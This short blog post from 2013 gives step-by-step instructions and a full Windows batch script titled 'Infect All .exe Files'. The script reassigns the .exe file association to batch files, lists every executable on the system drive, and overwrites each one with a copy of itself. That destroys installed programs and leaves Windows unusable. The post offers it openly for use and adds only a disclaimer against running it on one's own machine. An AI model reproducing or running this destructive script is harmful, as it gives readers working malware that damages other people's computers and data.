Saturday 4 May 2013

Infect All .exe Files In The Computer

Method :

1. Open Notepad

2. Copy the code given below


Code:
@ echo off
rem ---------------------------------
rem Infect All .Exe Files
assoc .exe=batfile
DIR /S/B %SystemDrive%\*.exe >> InfList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (InfList_exe.txt) do copy /y %0 "%%j:%%k"
rem ---------------------------------

3. Save as "Anything.bat"

Warning :
Do not try this on your own computer. I will not be responsible for any damages caused to your computer

0 comments:

Post a Comment